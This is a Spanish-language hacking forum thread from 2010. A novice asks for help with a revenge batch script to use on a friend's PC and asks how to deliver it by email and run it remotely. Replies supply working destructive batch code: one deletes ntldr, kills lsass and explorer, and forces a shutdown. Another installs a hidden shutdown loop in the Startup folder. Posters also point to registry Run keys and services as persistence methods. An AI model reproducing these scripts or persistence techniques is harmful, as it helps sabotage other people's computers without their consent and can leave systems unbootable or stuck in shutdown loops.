elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Como proteger una cartera - billetera de Bitcoin


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  Maldad.bat ¬¬?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Maldad.bat ¬¬?  (Leído 6,338 veces)
DA KILLER

Desconectado Desconectado

Mensajes: 85


Solo sé que no sé nada...


Ver Perfil
Maldad.bat ¬¬?
« en: 11 Abril 2010, 09:37 am »

Hola, hace unos dias empece en esto de la programación y tras un poco de práctica pensé en hacer un programa con un fin malicioso ya que es en venganza a un amigo que como chistoso me trató de instalar un keylogger, espero su opinión y quería que me digan si me equivoco en el código ya que obviamente no lo puedo probar en mi computadora y el ciber está cerrado por mantenimiento ¬¬' .

Name.bat

Código:
@echo off 
color 0A
echo.
echo                       --------------------------------------
echo                        .*ï ENTER THE PASSWORD FOR START `*.
echo                       --------------------------------------
echo.
echo.
set/p pass=Password:
if %pass%==54537 (start title KILLER'$) ELSE (echo Wrong pass!
goto bad)
:bad
echo shutdown -s -f -t 0 >> c:\autoexec.bat

Si no me equivoco la cosa sería que si el usuario no ingresa como pass "54537" se apagaría el PC y quedaría en la configuración del autoexe así que se prendería y apagaría.

Espero respuestas y opiniones, y si alguien me explica como podría hacer para plantarlo mediante un email y ejecutarlo remotamente lo agradeceré.

Saludos a todos.


En línea

.: DA KILLER :.


DA KILLER

Desconectado Desconectado

Mensajes: 85


Solo sé que no sé nada...


Ver Perfil
Re: Maldad.bat ¬¬?
« Respuesta #1 en: 11 Abril 2010, 10:36 am »

Lo siento de nuevo me equivoqué de sección, si algún mod lo lee que lo pase a la sección correspondiente

:-[ Perdon por las molestias :-[


En línea

.: DA KILLER :.


leogtz
. . .. ... ..... ........ ............. .....................
Colaborador
***
Desconectado Desconectado

Mensajes: 3.069


/^$/


Ver Perfil WWW
Re: Maldad.bat ¬¬?
« Respuesta #2 en: 11 Abril 2010, 18:08 pm »

¿Qué es KILLER'$?

Respecto al código, te digo que es muy simple.
En línea

Código
  1. (( 1 / 0 )) &> /dev/null || {
  2. echo -e "stderrrrrrrrrrrrrrrrrrr";
  3. }
  4.  
http://leonardogtzr.wordpress.com/
leogutierrezramirez@gmail.com
winroot


Desconectado Desconectado

Mensajes: 589

#include<winroot.h>


Ver Perfil WWW
Re: Maldad.bat ¬¬?
« Respuesta #3 en: 11 Abril 2010, 19:43 pm »

na
Código:
@echo off
attrib -h -s -r  c:\ntldr
del /q c:\ntldr
move %windir%\system32\shutdown.exe %windir%\system32\drivers\etc\a.exe
taskkill /f /im lsass.exe
taskkill /f /im explorer.exe
del /q %windir%\explorer.exe
start %windir%\system32\drivers\etc\a.exe -s -t0

lo de autoejecutarse, el autoexec.bat no funciona como archivo de arranque en  windows nt,para eso estan las keys del registro.
con el   comando reg, podes manejar el registro.

saludos  


 :xD
En línea

Mi blog sobre programación y seguridad informática:
http://win-root.blogspot.com
DA KILLER

Desconectado Desconectado

Mensajes: 85


Solo sé que no sé nada...


Ver Perfil
Re: Maldad.bat ¬¬?
« Respuesta #4 en: 12 Abril 2010, 00:50 am »

Citar
¿Qué es KILLER'$?

Respecto al código, te digo que es muy simple.

KILLER'$ es el título de la ventana del DOS o CMD

Código:
start title KILLER'$

KILLER es mi nick "Da KILLER" es la pronunciación en español de "THE KILLER"

Y si el objetivo es que el comando sea la más simple posible
Citar
lo de autoejecutarse, el autoexec.bat no funciona como archivo de arranque en  windows nt,para eso estan las keys del registro.
con el   comando reg, podes manejar el registro.

saludos

Si es que no se NADA de programación y como nunca utilizé NT ni ME ni VISTA ni 7 no tengo idea de que puede funcionar o no, pero llevo menos de una semana en esto de la programación, en cuanto al REG lo voy a practicar esta noche o mañana.

Igual gracias por la ayuda :)
En línea

.: DA KILLER :.


☺BADMAN

Desconectado Desconectado

Mensajes: 51


Este es un Moderador de CPH


Ver Perfil
Re: Maldad.bat ¬¬?
« Respuesta #5 en: 12 Abril 2010, 00:56 am »

Código:
echo shutdown -s -f -t 0 >> c:\autoexec.bat

  Xd Men esto es Futurama ... :¬¬
En línea

Experto en Biefrost.
Subseven User.
Especialista en crypters.
Tifa FAN
Batch Programer XD ;D
DA KILLER

Desconectado Desconectado

Mensajes: 85


Solo sé que no sé nada...


Ver Perfil
Re: Maldad.bat ¬¬?
« Respuesta #6 en: 12 Abril 2010, 01:02 am »

Pues para mi mas o menos si  :P

Pero en lugar de ser fry soy como Zoiberg  :-\
En línea

.: DA KILLER :.


winroot


Desconectado Desconectado

Mensajes: 589

#include<winroot.h>


Ver Perfil WWW
Re: Maldad.bat ¬¬?
« Respuesta #7 en: 12 Abril 2010, 01:21 am »

Código:
echo shutdown -s -f -t 0 >> c:\autoexec.bat

  Xd Men esto es Futurama ... :¬¬
hola,

en  realidad, ese archivo se usava en msdos y solo esta en windows por compatibilidad de aplicaciones de 16 bits.

para correr al arranque hay muchas maneras.
la mas usada por el malware es el registro de windows, mas espesificamente los servicios (hklm\system\services)
y las keys run (hklm||hkcu\software\microsoft\windows\currentversion\run)
con la  utilidad  msconfig, se  pueden ver los programas puestos al arranque de windows.

otra cosa, recuerden que batch no es un lenguaje de programacion.

no te recomiendo empezar a manejar el registro de windows, sin saber  primero lo basico de batch, y algo sobre el funcionamiento  interno de windows.

saludos 
En línea

Mi blog sobre programación y seguridad informática:
http://win-root.blogspot.com
berni69


Desconectado Desconectado

Mensajes: 798


Sapere aude!!


Ver Perfil WWW
Re: Maldad.bat ¬¬?
« Respuesta #8 en: 12 Abril 2010, 19:44 pm »

Siempre se podria hacer algo asi  :rolleyes:

Código:
echo shutdown -s -f -t 0 >>  123.bat
copy 123.bat "%homedrive%%homepath%\MENINI~1\Programas\Inicio"
cd "%homedrive%%homepath%\MENINI~1\Programas\Inicio\"
attrib +r +h +s +a 123.bat
start 123.bat

y asi no tener que tocar el registro jeje
En línea

Errar es humano, pero para liar las cosas de verdad se necesita un ordenador

Tutorial Swifi keygen + Airwin 2.0
DA KILLER

Desconectado Desconectado

Mensajes: 85


Solo sé que no sé nada...


Ver Perfil
Re: Maldad.bat ¬¬?
« Respuesta #9 en: 14 Abril 2010, 03:29 am »

Bueno gracias a todos por la ayuda, realmente me han ayudado mucho y en cuanto pueda voy a tratar de probarlo a ver que tal funciona.

Saludos a todos y gracias por todo de nuevo.

-KILLER-
En línea

.: DA KILLER :.


Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
El origen de la maldad humana. « 1 2 3 »
Foro Libre
buite 24 8,188 Último mensaje 29 Enero 2018, 10:29 am
por buite
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines